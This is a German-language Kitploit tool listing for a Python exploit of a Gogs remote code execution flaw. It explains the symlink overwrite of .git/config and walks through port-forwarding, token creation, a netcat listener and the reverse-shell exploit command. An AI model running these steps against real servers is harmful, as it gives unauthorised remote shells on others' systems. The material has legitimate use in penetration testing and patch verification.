Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
Tools/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

Repository anzeigen
13vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gogs CVE-2025-8110 RCE Exploit

Ein automatisiertes Python-Exploit für CVE-2025-8110 in Gogs. Diese Schwachstelle ermöglicht Remote Code Execution (RCE) durch Missbrauch der PutContents-API, die nicht überprüft, ob ein Dateipfad ein Symlink ist. Durch Überschreiben der internen .git/config-Datei über einen Symlink kann ein bösartiger sshCommand injiziert werden, um eine Reverse-Shell auszulösen.

🛠️ Voraussetzungen

Stellen Sie sicher, dass Python 3 und die erforderlichen Abhängigkeiten installiert sind:

root@kitploit:~
pip install requests rich beautifulsoup4

Außerdem muss git installiert und in Ihrem $PATH erreichbar sein, um die Repository-Klon- und Commit-Phase durchführen zu können.

⚙️ Einrichtung & Konfiguration

1. Zugriff auf die Gogs-WebUI

Gogs kann an 127.0.0.1:3001 gebunden sein. Verwenden Sie Portweiterleitung, um lokal auf die WebUI zuzugreifen:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. Kontoerstellung

Nach der Weiterleitung navigieren Sie zu http://localhost:3001:

  • Erstellen Sie ein neues Konto.
  • Notieren Sie sich Benutzername und Passwort für das Skript.

3. Generieren des API-Tokens

Das Skript verwendet die Gogs-API, um die Payload auszuliefern:

  1. Melden Sie sich in der WebUI an.
  2. Navigieren Sie zu Einstellungen -> Anwendungen.
  3. Unter Persönliche Zugriffstokens verwalten generieren Sie ein neues Token.
  4. Kopieren Sie das Token sofort.

🚀 Ausführung

1. Starten eines Netcat-Listeners

Starten Sie Ihren Listener, bevor Sie das Skript ausführen, da die Shell ausgelöst wird, sobald das API-Update verarbeitet wird.

root@kitploit:~
nc -lvnp 5555

2. Ausführen des Exploits

Übergeben Sie Ihre Anmeldedaten und das Token als Argumente:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <IHR_BENUTZER> -pw <IHR_PASSWORT> -t <IHR_TOKEN> -lh <IHRE_IP> -lp 5555

Argumente

FlagBeschreibung
-uDie Basis-URL der Gogs-Instanz (z. B. http://localhost:3001).
-unDer Benutzername des von Ihnen erstellten Kontos.
-pwDas Passwort des von Ihnen erstellten Kontos.
-tDas in den Einstellungen generierte API-Token.
-lhDie IP-Adresse Ihres Listeners (LHOST).
-lpDer Port Ihres Listeners (LPORT).

Hinweis: Wenn das Skript hängt oder nach „Überschreiben von .git/config“ einen Read timed out zurückgibt, überprüfen Sie Ihren Listener. Dies deutet normalerweise darauf hin, dass die Reverse-Shell erfolgreich verbunden wurde und die Verbindung hält.


Autor: TYehan

Haftungsausschluss: Dieses Tool dient nur zu Bildungszwecken und für autorisierte Sicherheitsaudits. Verwenden Sie es verantwortungsbewusst.

Tool herunterladen